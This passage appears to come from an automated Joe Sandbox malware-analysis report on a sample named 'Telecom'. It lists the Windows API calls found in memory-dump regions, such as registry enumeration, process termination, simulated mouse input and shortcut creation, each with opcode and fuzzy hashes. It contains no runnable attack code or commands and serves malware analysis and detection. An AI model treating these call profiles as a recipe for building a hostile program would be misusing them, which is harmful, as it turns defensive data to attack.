                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                      • String ID:
                                                      • API String ID: 1992179935-0
                                                      • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                      • Instruction ID: 22f2f4f37b3f842147f90c2892e4344be8419d76aef18c1695aec182eb19fe37
                                                      • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                      • Instruction Fuzzy Hash: 7781D672601705EBE720AF79CC81BEB73A9AF44328F14C52FE519D6381E7B8D9018799
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00468649,00468649,?,?,?,004767C2,00000001,00000001,8BE85006), ref: 004765CB
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,004767C2,00000001,00000001,8BE85006,?,?,?), ref: 00476651
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0047674B
                                                      • __freea.LIBCMT ref: 00476758
                                                        • Part of subcall function 00473B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00466A79,?,0000015D,?,?,?,?,004685B0,000000FF,00000000,?,?), ref: 00473BC5
                                                      • __freea.LIBCMT ref: 00476761
                                                      • __freea.LIBCMT ref: 00476786
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1414292761-0
                                                      • Opcode ID: 832a612e62228f2d16e533fce2fc25dec3033863de74d07ba316acdc7b6b396f
                                                      • Instruction ID: 0a4f5ceb02d7fde52eb732b4c784fcd2112b277ee0140d9602a554b57c8dc7dc
                                                      • Opcode Fuzzy Hash: 832a612e62228f2d16e533fce2fc25dec3033863de74d07ba316acdc7b6b396f
                                                      • Instruction Fuzzy Hash: 68510772600506AFDB285E64CC41EEF77ABEB40758F16866BFC0CD6240EB38DC509658
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 0044B329: _wcslen.LIBCMT ref: 0044B333
                                                        • Part of subcall function 004CD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004CC10E,?,?), ref: 004CD415
                                                        • Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD451
                                                        • Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD4C8
                                                        • Part of subcall function 004CD3F8: _wcslen.LIBCMT ref: 004CD4FE
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004CC72A
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004CC785
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004CC7CA
                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004CC7F9
                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004CC853
                                                      • RegCloseKey.ADVAPI32(?), ref: 004CC85F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                      • String ID:
                                                      • API String ID: 1120388591-0
                                                      • Opcode ID: a424d2588404cdba2283cc85744083059341572e5fe11f3302f311760e09b88b
                                                      • Instruction ID: f6c3252aaed71708ceee6e2b5905c4516d730492a4de683137660a6883bb85dd
                                                      • Opcode Fuzzy Hash: a424d2588404cdba2283cc85744083059341572e5fe11f3302f311760e09b88b
                                                      • Instruction Fuzzy Hash: EF817D74508241AFD754DF24C885F2ABBE5FF84308F1444AEF4598B2A2DB35ED06CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VariantInit.OLEAUT32(00000035), ref: 004A00A9
                                                      • SysAllocString.OLEAUT32(00000000), ref: 004A0150
                                                      • VariantCopy.OLEAUT32(004A0354,00000000), ref: 004A0179
                                                      • VariantClear.OLEAUT32(004A0354), ref: 004A019D
                                                      • VariantCopy.OLEAUT32(004A0354,00000000), ref: 004A01A1
                                                      • VariantClear.OLEAUT32(?), ref: 004A01AB
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCopy$AllocInitString
                                                      • String ID:
                                                      • API String ID: 3859894641-0
                                                      • Opcode ID: dea5ce99a933890bf657881946eb56ae045fbe4ad68c6cb25b19a6afe6373289
                                                      • Instruction ID: d1fe811c8707925fa5a77a64207b0dce9a0c0b1f295ec8887ddf5f57470b9f49
                                                      • Opcode Fuzzy Hash: dea5ce99a933890bf657881946eb56ae045fbe4ad68c6cb25b19a6afe6373289
                                                      • Instruction Fuzzy Hash: A6513D31500310E6CF10AF659885769B3A5EF67314F14848BF806DF296DB788C45CB9F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _wcslen.LIBCMT ref: 004B6F21
                                                      • CoInitialize.OLE32(00000000), ref: 004B707E
                                                      • CoCreateInstance.OLE32(004E0CC4,00000000,00000001,004E0B34,?), ref: 004B7095
                                                      • CoUninitialize.OLE32 ref: 004B7319
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 886957087-24824748
                                                      • Opcode ID: a5472a25b1054c3d26723fec2aae03f2be02fdd14057f724cccae24b710e2442
                                                      • Instruction ID: 49006135244f8065ec1615c25060b59d2875b0421924d96eb743209ef6fa8040
                                                      • Opcode Fuzzy Hash: a5472a25b1054c3d26723fec2aae03f2be02fdd14057f724cccae24b710e2442
                                                      • Instruction Fuzzy Hash: 3DD16B71508201AFD304EF25C881EABB7E8FF98708F40496EF5859B262DB75ED05CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 004B11B3
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 004B11EE
                                                      • EnterCriticalSection.KERNEL32(?), ref: 004B120A
                                                      • LeaveCriticalSection.KERNEL32(?), ref: 004B1283
                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 004B129A
                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 004B12C8
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3368777196-0
                                                      • Opcode ID: 04bdd164b7ef90529d18f485605787acaf77c4941bf3aa6170ff1bf850270b69
                                                      • Instruction ID: 014fff0577b65510da415c32404043e9a0c74d81b9a86d54b6c833b774142f3d
                                                      • Opcode Fuzzy Hash: 04bdd164b7ef90529d18f485605787acaf77c4941bf3aa6170ff1bf850270b69
                                                      • Instruction Fuzzy Hash: 11419071900205EFDF049F54DC85AAA77B8FF05304F1440AAED00AB2A6DB34DE51DBA8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0049FBEF,00000000,?,?,00000000,?,004839E2,00000004,00000000,00000000), ref: 004D8CA7
                                                      • EnableWindow.USER32(?,00000000), ref: 004D8CCD
                                                      • ShowWindow.USER32(FFFFFFFF,00000000), ref: 004D8D2C
                                                      • ShowWindow.USER32(?,00000004), ref: 004D8D40
                                                      • EnableWindow.USER32(?,00000001), ref: 004D8D66
                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 004D8D8A
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$Enable$MessageSend
                                                      • String ID:
                                                      • API String ID: 642888154-0
                                                      • Opcode ID: 1d2f420f011a7ed3183e7e0c0ccb17dbdfc890378de025d6dd9a8ebbe0402441
                                                      • Instruction ID: c5f623f92aec6c54e7024ce8ce881cbe2f9e5f7190690e1479fffcc0e202ce6a
                                                      • Opcode Fuzzy Hash: 1d2f420f011a7ed3183e7e0c0ccb17dbdfc890378de025d6dd9a8ebbe0402441
                                                      • Instruction Fuzzy Hash: 9D417130602244EFDB25DF24C899BB67BE1FB55B04F1840AFE5084B3A2CB35A859DB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 004C2D45
                                                        • Part of subcall function 004BEF33: GetWindowRect.USER32(?,?), ref: 004BEF4B
                                                      • GetDesktopWindow.USER32 ref: 004C2D6F
                                                      • GetWindowRect.USER32(00000000), ref: 004C2D76
                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 004C2DB2
                                                      • GetCursorPos.USER32(?), ref: 004C2DDE
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004C2E3C
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                      • String ID:
                                                      • API String ID: 2387181109-0
                                                      • Opcode ID: d0399582c1a02e957c99ebe1c819bfe4b7485c4c218b62dc7941ab56b9feab79
                                                      • Instruction ID: b244ecce01d523f6748d66391cf2522e91a0c1a0acf5c1bbc67a301bfcc8dc2b
                                                      • Opcode Fuzzy Hash: d0399582c1a02e957c99ebe1c819bfe4b7485c4c218b62dc7941ab56b9feab79
                                                      • Instruction Fuzzy Hash: 8D311072906315ABC720DF14D844F9BB7A9FB95314F00092EF48597181DAB4E908CBEA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 004A55F9
                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004A5616
                                                      • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004A564E
                                                      • _wcslen.LIBCMT ref: 004A566C
                                                      • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004A5674
                                                      • _wcsstr.LIBVCRUNTIME ref: 004A567E
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                      • String ID:
                                                      • API String ID: 72514467-0
                                                      • Opcode ID: aa8ab05f2749432ad357ae70ca42e5f0c6e4db750c288020092a3214bd768c0b
                                                      • Instruction ID: 13ed4524fcd07831a8a6bba467ae3c883831675a2601e852d403077da22548b4
                                                      • Opcode Fuzzy Hash: aa8ab05f2749432ad357ae70ca42e5f0c6e4db750c288020092a3214bd768c0b
                                                      • Instruction Fuzzy Hash: 6C213832604600BBEB155B35DD49EBF7BACDF56710F14403FF809CA191EB69CC4196A9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00445851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004455D1,?,?,00484B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00445871
                                                      • _wcslen.LIBCMT ref: 004B62C0
                                                      • CoInitialize.OLE32(00000000), ref: 004B63DA
                                                      • CoCreateInstance.OLE32(004E0CC4,00000000,00000001,004E0B34,?), ref: 004B63F3
                                                      • CoUninitialize.OLE32 ref: 004B6411
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 3172280962-24824748
                                                      • Opcode ID: 3bf9b1c4a1291a0062e7eae7c9a23b1ea416f4d12f6227ef4637e19fd4f67590
                                                      • Instruction ID: e18f4ad0990e1e569f3221856c3009c609581e0f28031af5cb21eb84e07cf03f
                                                      • Opcode Fuzzy Hash: 3bf9b1c4a1291a0062e7eae7c9a23b1ea416f4d12f6227ef4637e19fd4f67590
                                                      • Instruction Fuzzy Hash: 74D14371A043019FC714EF25C480A6ABBE5FF89714F15885EF8859B361CB39EC45CBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetLastError.KERNEL32(?,00000000,00464D53,00000000,?,?,004668E2,?,?,00000000), ref: 004730EB
                                                      • _free.LIBCMT ref: 0047311E
                                                      • _free.LIBCMT ref: 00473146
                                                      • SetLastError.KERNEL32(00000000,?,00000000), ref: 00473153
                                                      • SetLastError.KERNEL32(00000000,?,00000000), ref: 0047315F
                                                      • _abort.LIBCMT ref: 00473165
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free$_abort
                                                      • String ID:
                                                      • API String ID: 3160817290-0
                                                      • Opcode ID: cf4a37621cf5c5c88b4779cb3dfc1a8473e0b36986e4fcc6743b0c7470ac7851
                                                      • Instruction ID: e67c897b347545ea6669b61f303fd2776b5cea80840e73e739dcfc7e52c05f77
                                                      • Opcode Fuzzy Hash: cf4a37621cf5c5c88b4779cb3dfc1a8473e0b36986e4fcc6743b0c7470ac7851
                                                      • Instruction Fuzzy Hash: FBF0F93590050076C2122B36AD06ADF1765DFC0776B64C42FF91CE22D2EE6C8D02616D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 00441F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00441F87
                                                        • Part of subcall function 00441F2D: SelectObject.GDI32(?,00000000), ref: 00441F96
                                                        • Part of subcall function 00441F2D: BeginPath.GDI32(?), ref: 00441FAD
                                                        • Part of subcall function 00441F2D: SelectObject.GDI32(?,00000000), ref: 00441FD6
                                                      • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 004D94AA
                                                      • LineTo.GDI32(?,00000003,00000000), ref: 004D94BE
                                                      • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 004D94CC
                                                      • LineTo.GDI32(?,00000000,00000003), ref: 004D94DC
                                                      • EndPath.GDI32(?), ref: 004D94EC
                                                      • StrokePath.GDI32(?), ref: 004D94FC
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                      • String ID:
                                                      • API String ID: 43455801-0
                                                      • Opcode ID: 70419b7a53075a4b7eb859581ea171ed7dc83c540bab1b4911565344bc065711
                                                      • Instruction ID: b3be541bcfa109e92780f5cc8b92b1435230bcfe845731e95277f45ff317042d
                                                      • Opcode Fuzzy Hash: 70419b7a53075a4b7eb859581ea171ed7dc83c540bab1b4911565344bc065711
                                                      • Instruction Fuzzy Hash: 43111B7240114DBFEF029F94DC88EDA7F6DEB08364F00C022BA198A1A1C771AD55DBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 004432AF
                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 004432B7
                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004432C2
                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004432CD
                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 004432D5
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 004432DD
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Virtual
                                                      • String ID:
                                                      • API String ID: 4278518827-0
                                                      • Opcode ID: d25b3a50e8118d77ccde76da99c18b83bd04c6bbf6c3af1165a1b32fe8291cdb
                                                      • Instruction ID: 01f05e8d6638db205e91ea3869077892134d7d58281d57cbc9f0cfc9060631c6
                                                      • Opcode Fuzzy Hash: d25b3a50e8118d77ccde76da99c18b83bd04c6bbf6c3af1165a1b32fe8291cdb
                                                      • Instruction Fuzzy Hash: A40167B0942B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 004AF447
                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 004AF45D
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 004AF46C
                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004AF47B
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004AF485
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 004AF48C
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                      • String ID:
                                                      • API String ID: 839392675-0
                                                      • Opcode ID: 938039c475649ec79358249c6fa992b8ccb77a96ac97be195066932551dab1ab
                                                      • Instruction ID: b0bc786de940044457439fa1a3dedf5fd921f47629ed9377e5472a08007466b7
                                                      • Opcode Fuzzy Hash: 938039c475649ec79358249c6fa992b8ccb77a96ac97be195066932551dab1ab
                                                      • Instruction Fuzzy Hash: 4BF05432642158BBE7215B529C0EEEF7F7CEFC7B11F00006AF601D1190D7A45A01C6B9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetClientRect.USER32(?), ref: 004834EF
                                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 00483506
                                                      • GetWindowDC.USER32(?), ref: 00483512
                                                      • GetPixel.GDI32(00000000,?,?), ref: 00483521
                                                      • ReleaseDC.USER32(?,00000000), ref: 00483533
                                                      • GetSysColor.USER32(00000005), ref: 0048354D
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                      • String ID:
                                                      • API String ID: 272304278-0
                                                      • Opcode ID: f52d5065911cef5f74b2ec5a7533c080deedea07c8b795d0931f28286ac610e4
